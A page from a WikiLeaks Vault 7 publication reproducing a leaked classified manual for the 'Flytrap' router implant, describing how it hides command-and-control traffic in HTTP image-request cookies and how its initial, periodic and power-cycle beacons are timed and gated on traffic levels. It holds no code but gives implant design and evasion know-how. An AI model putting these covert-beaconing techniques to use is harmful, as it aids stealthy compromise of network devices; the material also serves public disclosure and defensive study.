Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//20350112
(S) To achieve Covert Communication, the Flytrap sends the communication data (after
encryption) as the cookie of an HTTP GET request for an image file (.ico) on port 80
(unless the PoP has been specified with a different port). The CT responds to the GET
request with a binary image file in an HTTP Response.
15.2 (U) Beacon Logic
(S) This section documents the logic used when sending Beacons. Flytraps will
periodically make “Beacon attempts” to retrieve Mission tasking. If, as a result of a
Beacon attempt, the Flytrap retrieves a Mission, then the Beacon attempt is considered
successful.
The distinction is made between three types of Beacons:
1. Initial Beacon – the very first Beacon sent after a device has been converted to a
Flytrap, or after a device has undergone a hard-reset (i.e., it’s NVRAM has been
reset to an initial state). Note that some newer firmwares will preserve Flytrap
NVRAM parameters even after a hard-reset – in this case, one and only one
successful Initial Beacon event will ever occur on this Flytrap.
2. Periodic Beacon – Beacons sent periodically between device power-cycles.
3. Power-Cycle Beacon – if a Flytrap has successfully sent its Initial Beacon, and
then the Flytrap is power-cycled, the first Beacon attempt after the power-cycle
event is the Power-Cycle Beacon.
Relevant definitions:
Initial Beacon Interval – the amount of time a Flytrap must be powered-on before an
Initial Beacon attempt
Periodic Beacon Interval – after a successful Beacon attempt is made (i.e., a
Mission is received), the amount of time to wait before sending the next Periodic
Beacon.
Initial/Periodic Beacon Traffic Requirement – the traffic requirement necessary
when sending the Initial/Periodic Beacon. The traffic requirement test has two stages:
“packets per second” test, and internet connectivity test. The following Traffic
Requirements are defined:
Traffic Requirement Packets per Second Internet Connectivity Test
NONE 0 No
LOW 10 Yes
MEDIUM 50 Yes
HIGH 100 Yes
For example, if the Initial/Periodic Beacon Traffic Requirement were MEDIUM, a
Beacon would not be sent unless at least 50 packets of network traffic per second
were passing through the Flytrap and the Flytrap had internet connectivity. The
internet connectivity test involves a few different active techniques (note that the
CB team has advised the use of a passive approach), including NTP requests to
different NTP servers, and DNS lookup of the manufacturers home page. The
130
SECRET//20350112

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh